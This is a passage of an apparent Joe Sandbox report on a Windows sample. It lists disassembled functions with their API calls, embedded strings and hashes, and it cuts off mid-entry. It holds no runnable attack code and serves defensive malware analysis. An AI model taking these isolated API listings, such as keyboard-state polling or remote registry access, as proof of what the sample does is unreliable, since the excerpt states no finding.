                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 1939486746-1459072770
                                                                      • Opcode ID: d536e1b073142a42bcc5fadf151fc9a8585d53b8adb85dfd822ca3d05172cb29
                                                                      • Instruction ID: 0840d4c0a48c065e2e1998865e147faf156a256cf6335b72960ace5208a214a6
                                                                      • Opcode Fuzzy Hash: d536e1b073142a42bcc5fadf151fc9a8585d53b8adb85dfd822ca3d05172cb29
                                                                      • Instruction Fuzzy Hash: 9141FF329402117BDB24BA65DC83EBF77ACEF55754F10006AF901A61C2EA749A01A7B9
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C93D40
                                                                      • _wcslen.LIBCMT ref: 00C93D6D
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C93D9D
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C93DBE
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00C93DCE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C93E55
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C93E60
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C93E6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 1149970189-3457252023
                                                                      • Opcode ID: 1108a67f9853bce7c90593cd0d3ca972b0f5caf7e895ad5957aa843b4f7fea1b
                                                                      • Instruction ID: 369f168465a81dc34bafe762a7e431c160b4f91144093f0797cfe8feda4f04aa
                                                                      • Opcode Fuzzy Hash: 1108a67f9853bce7c90593cd0d3ca972b0f5caf7e895ad5957aa843b4f7fea1b
                                                                      • Instruction Fuzzy Hash: 4E319EB6A14249ABDB219FA0DC89FEF37BCEF88700F1041B5F619D6160EB7497448B24
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00C8E6B4
                                                                        • Part of subcall function 00C3E551: timeGetTime.WINMM(?,?,00C8E6D4), ref: 00C3E555
                                                                      • Sleep.KERNEL32(0000000A), ref: 00C8E6E1
                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C8E705
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C8E727
                                                                      • SetActiveWindow.USER32 ref: 00C8E746
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C8E754
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C8E773
                                                                      • Sleep.KERNEL32(000000FA), ref: 00C8E77E
                                                                      • IsWindow.USER32 ref: 00C8E78A
                                                                      • EndDialog.USER32(00000000), ref: 00C8E79B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: e751979a428bc6245d7503509f512ad7ec5fd4944d365bccfb2daf216c92e334
                                                                      • Instruction ID: 6e9a50df8c48f90935c4d660259bca45b13b8a73973902909f6306b6ba212771
                                                                      • Opcode Fuzzy Hash: e751979a428bc6245d7503509f512ad7ec5fd4944d365bccfb2daf216c92e334
                                                                      • Instruction Fuzzy Hash: 86216DB0200644AFEB106F60ECC9F3E3B69E754B4DF111525F811C21B1DBB1AC04EB2A
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C8EA5D
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C8EA73
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8EA84
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C8EA96
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C8EAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2420728520-1007645807
                                                                      • Opcode ID: 7c2de9ea8402f4e987c881fe1e5cd7e118e76c0cf4fc99b1ff53edd84ae2d4ee
                                                                      • Instruction ID: 126b6e2cbb86363023c8b064fbaec6438a81ccff142f0e71385fd7698aeec1a1
                                                                      • Opcode Fuzzy Hash: 7c2de9ea8402f4e987c881fe1e5cd7e118e76c0cf4fc99b1ff53edd84ae2d4ee
                                                                      • Instruction Fuzzy Hash: B11137316A02B979D724F766DC4ADFF6A7CEBD1F44F400435B411A20D1DE705A45D6B0
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C8A012
                                                                      • SetKeyboardState.USER32(?), ref: 00C8A07D
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00C8A09D
                                                                      • GetKeyState.USER32(000000A0), ref: 00C8A0B4
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00C8A0E3
                                                                      • GetKeyState.USER32(000000A1), ref: 00C8A0F4
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00C8A120
                                                                      • GetKeyState.USER32(00000011), ref: 00C8A12E
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00C8A157
                                                                      • GetKeyState.USER32(00000012), ref: 00C8A165
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00C8A18E
                                                                      • GetKeyState.USER32(0000005B), ref: 00C8A19C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 5c9d9c2c87bf5d05273b9135caa17c4f21922c832d1da2aecdc68b08d16c96cb
                                                                      • Instruction ID: fe08d9c3b6220888ab726e00f7c7ca1adb1bdbbd1dcdd33fdcae32b5ec5f7ce0
                                                                      • Opcode Fuzzy Hash: 5c9d9c2c87bf5d05273b9135caa17c4f21922c832d1da2aecdc68b08d16c96cb
                                                                      • Instruction Fuzzy Hash: 7651EB309047886AFB35FBA048147FEAFB49F12348F0C459AD5D2571C2EA64AF4CC76A
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00C85CE2
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C85CFB
                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C85D59
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00C85D69
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C85D7B
                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C85DCF
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C85DDD
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C85DEF
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C85E31
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C85E44
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C85E5A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C85E67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: b2243d9406abace523d4e7c4d531cf3bca236fbb29c0b166b8eec40aef8705da
                                                                      • Instruction ID: 23d0432077e33ef5bcf258d98c3ebf32dc41094ab10741f82274008b40aed4b8
                                                                      • Opcode Fuzzy Hash: b2243d9406abace523d4e7c4d531cf3bca236fbb29c0b166b8eec40aef8705da
                                                                      • Instruction Fuzzy Hash: 2151FE71A00605AFDF18DF68DD89BAEBBB9FB48305F148229F915E7290D7709E04CB54
                                                                      APIs
                                                                        • Part of subcall function 00C38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C38BE8,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C38FC5
                                                                      • DestroyWindow.USER32(?), ref: 00C38C81
                                                                      • KillTimer.USER32(00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C38D1B
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00C76973
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C769A1
                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C769B8
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C38BBA,00000000), ref: 00C769D4
                                                                      • DeleteObject.GDI32(00000000), ref: 00C769E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 6143e2a10d17f012ebe92821676ee71ac6d15b9258222bfb5f8ed1f433bb5e7e
                                                                      • Instruction ID: 06a65041483b4d27f76de5ece1c864988f8af3adcf188b41a68549134a245599
                                                                      • Opcode Fuzzy Hash: 6143e2a10d17f012ebe92821676ee71ac6d15b9258222bfb5f8ed1f433bb5e7e
                                                                      • Instruction Fuzzy Hash: BC61AF30511B00DFCB259F25E948B3977F1FB40322F189518F456A75A0CB75AE84DFA1
                                                                      APIs
                                                                        • Part of subcall function 00C39944: GetWindowLongW.USER32(?,000000EB), ref: 00C39952
                                                                      • GetSysColor.USER32(0000000F), ref: 00C39862
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 957aa97301b12fdf881485864e14a479992ef39060193df0a65684a787e207b1
                                                                      • Instruction ID: e37c5105d7cca0abd11901240d30f12bd4c862d9c108820122c9f02f8ea0eb66
                                                                      • Opcode Fuzzy Hash: 957aa97301b12fdf881485864e14a479992ef39060193df0a65684a787e207b1
                                                                      • Instruction Fuzzy Hash: 8741A031114644AFDB205F389C88BBE3BA5EB46330F144715F9B6972E1C7B19D41DB12
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00C6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C89717
                                                                      • LoadStringW.USER32(00000000,?,00C6F7F8,00000001), ref: 00C89720
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C89742
                                                                      • LoadStringW.USER32(00000000,?,00C6F7F8,00000001), ref: 00C89745
                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C89866
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 747408836-2268648507
                                                                      • Opcode ID: 856986be38b5aae57b2e8f6a5d482a3a9d31d07cdc6171c1e4fc737653d62d3e
                                                                      • Instruction ID: 556b7384e936b6f72cb834a1eae9b461bcf8029a9d9a6f89ec8e00ebd938a355
                                                                      • Opcode Fuzzy Hash: 856986be38b5aae57b2e8f6a5d482a3a9d31d07cdc6171c1e4fc737653d62d3e
                                                                      • Instruction Fuzzy Hash: 56414C72800219ABCB04FBE0ED86EFEB778EF55344F140465F505720A2EA356F49EB61
                                                                      APIs
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C807A2
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C807BE
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C807DA
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C80804
                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C8082C
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C80837
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C8083C
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 323675364-22481851
                                                                      • Opcode ID: 12409158685413d0b11645c3fccc111691f343c827af37d1e0ea7d70f38d7fcf
                                                                      • Instruction ID: 71ce4a8c52c4dbd3c3feeb69be66025c861a10ee9a6df28697453dd63d017c93
                                                                      • Opcode Fuzzy Hash: 12409158685413d0b11645c3fccc111691f343c827af37d1e0ea7d70f38d7fcf
                                                                      • Instruction Fuzzy Hash: 27411472C10229ABCF21EBA4EC859EDB778FF44354F144129E911A31A1EB309E48DBA0
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00C97AF3
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C97B8F
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00C97BA3
                                                                      • CoCreateInstance.OLE32(00CBFD08,00000000,00000001,00CE6E6C,?), ref: 00C97BEF
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C97C74
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00C97CCC
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00C97D57
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C97D7A
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C97D81
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C97DD6
                                                                      • CoUninitialize.OLE32 ref: 00C97DDC
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 678cf57fa7347ec965e4875b7c1f5662470189b7eea5279d942d5582e069bb56
                                                                      • Instruction ID: 935f9d019360dc34da580cee8a7b5db24336ee7e965d27b7cbc5a39aa464a14d
                                                                      • Opcode Fuzzy Hash: 678cf57fa7347ec965e4875b7c1f5662470189b7eea5279d942d5582e069bb56
                                                                      • Instruction Fuzzy Hash: 70C11A75A04119AFCB14DFA4C888DAEBBF9FF48304F1485A9F8199B661D731EE41CB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CB5504
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CB5515
                                                                      • CharNextW.USER32(00000158), ref: 00CB5544
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CB5585
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CB559B
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CB55AC
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: 171265ca075cd3ff81838647a61ae4bc57fa5fa72fa68f8ef04b49d3dbc60d1b
                                                                      • Instruction ID: a4e733e9c3d38d0fc243ba9b99321d6249b13efb6e2273f210fd43c4016db581
                                                                      • Opcode Fuzzy Hash: 171265ca075cd3ff81838647a61ae4bc57fa5fa72fa68f8ef04b49d3dbc60d1b
                                                                      • Instruction Fuzzy Hash: 7E616770900608AFDF209FA5CC84FFE7BB9EB09725F148145FA25AB290D7749A81DB61
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C7FAAF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00C7FB08
                                                                      • VariantInit.OLEAUT32(?), ref: 00C7FB1A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C7FB3A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C7FB8D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C7FBA1
                                                                      • VariantClear.OLEAUT32(?), ref: 00C7FBB6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00C7FBC3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C7FBCC
                                                                      • VariantClear.OLEAUT32(?), ref: 00C7FBDE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C7FBE9
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: 5ae40e189b7797e8a5bf7faa2e0e62ec0bf30e842aa3e60a02912952073b3c7d
                                                                      • Instruction ID: 312337c0c38e1d2f811c8888c907e5f9b38adaa46e94a5e74fdef1044b81bb56
                                                                      • Opcode Fuzzy Hash: 5ae40e189b7797e8a5bf7faa2e0e62ec0bf30e842aa3e60a02912952073b3c7d
                                                                      • Instruction Fuzzy Hash: D2414435900219DFCB00DF64D894ABDBBB9EF48354F008569E955A7251C730AA46DFA0
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C89CA1
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00C89D22
                                                                      • GetKeyState.USER32(000000A0), ref: 00C89D3D
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00C89D57
                                                                      • GetKeyState.USER32(000000A1), ref: 00C89D6C
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00C89D84
                                                                      • GetKeyState.USER32(00000011), ref: 00C89D96
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00C89DAE
                                                                      • GetKeyState.USER32(00000012), ref: 00C89DC0
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00C89DD8
                                                                      • GetKeyState.USER32(0000005B), ref: 00C89DEA
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 7092df86446bbb86b85acfe307340f79cc582dd0f7ae6e591ab70c55b6da5fde
                                                                      • Instruction ID: 291c42765231436366c020864988e30506c2471fd3fdafd3a56a5456cb35cbf4
                                                                      • Opcode Fuzzy Hash: 7092df86446bbb86b85acfe307340f79cc582dd0f7ae6e591ab70c55b6da5fde
                                                                      • Instruction Fuzzy Hash: 944195346047C96DFF31A664C8443B5BEA0EB1134CF0C805ADAD6565C2DBB59BC8C7AA
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C933CF
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C933F0
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-3080491070
                                                                      • Opcode ID: 107a5d9e06dd9155cbde0f3ee56f97e04c54d41d63bffb4a5db8927f330e48a8
                                                                      • Instruction ID: 89d67aa84c3c43dcc2df64077b82a2787e0a6b38213b8788ccc70d1790d75720
                                                                      • Opcode Fuzzy Hash: 107a5d9e06dd9155cbde0f3ee56f97e04c54d41d63bffb4a5db8927f330e48a8
                                                                      • Instruction Fuzzy Hash: 86519A72900259ABDF15EBA0ED46EFEB778EF18340F144065F405720A2EB316F58EB61
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 1256254125-769500911
                                                                      • Opcode ID: 66cf86fe18b150adf535456a2b1eae32aa2e870aa48c26b0bfc4bf2fa93dfe03
                                                                      • Instruction ID: 89acb396111e1b9b9c59bfa175aae280de60c382b7ff9ffbeaf0a2d01db211f8
                                                                      • Opcode Fuzzy Hash: 66cf86fe18b150adf535456a2b1eae32aa2e870aa48c26b0bfc4bf2fa93dfe03
                                                                      • Instruction Fuzzy Hash: BB41A432A101279ACB247F7D88905BEB7A5BF60798B254129F435D7284F731CE81D794
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C953A0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C95416
                                                                      • GetLastError.KERNEL32 ref: 00C95420
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00C954A7
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 4fd0c2a3a39839699bfc4ac1ac993afd859018c70e92410a550eb5ed20e70500
                                                                      • Instruction ID: 3e661bfd007ff7c9f8755df69ee057df30a2a4b36b83b806e0d3f26b0ef8558d
                                                                      • Opcode Fuzzy Hash: 4fd0c2a3a39839699bfc4ac1ac993afd859018c70e92410a550eb5ed20e70500
                                                                      • Instruction Fuzzy Hash: 7931D075A006049FCF52DF69C888BAEBBB4FF54305F148069E416DB292DB30DE82CB90
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C81F64
                                                                      • GetDlgCtrlID.USER32 ref: 00C81F6F
                                                                      • GetParent.USER32 ref: 00C81F8B
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C81F8E
                                                                      • GetDlgCtrlID.USER32(?), ref: 00C81F97
                                                                      • GetParent.USER32(?), ref: 00C81FAB
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C81FAE
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 711023334-1403004172
                                                                      • Opcode ID: cdc1018a31bfc63f8f81101f04e0116248d81d97ab725b9d203da1895610aee3
                                                                      • Instruction ID: 1e09d5854ecea650d9b6a9a6fddc23aacedfe39dde8737e192f9103c84a6a55c
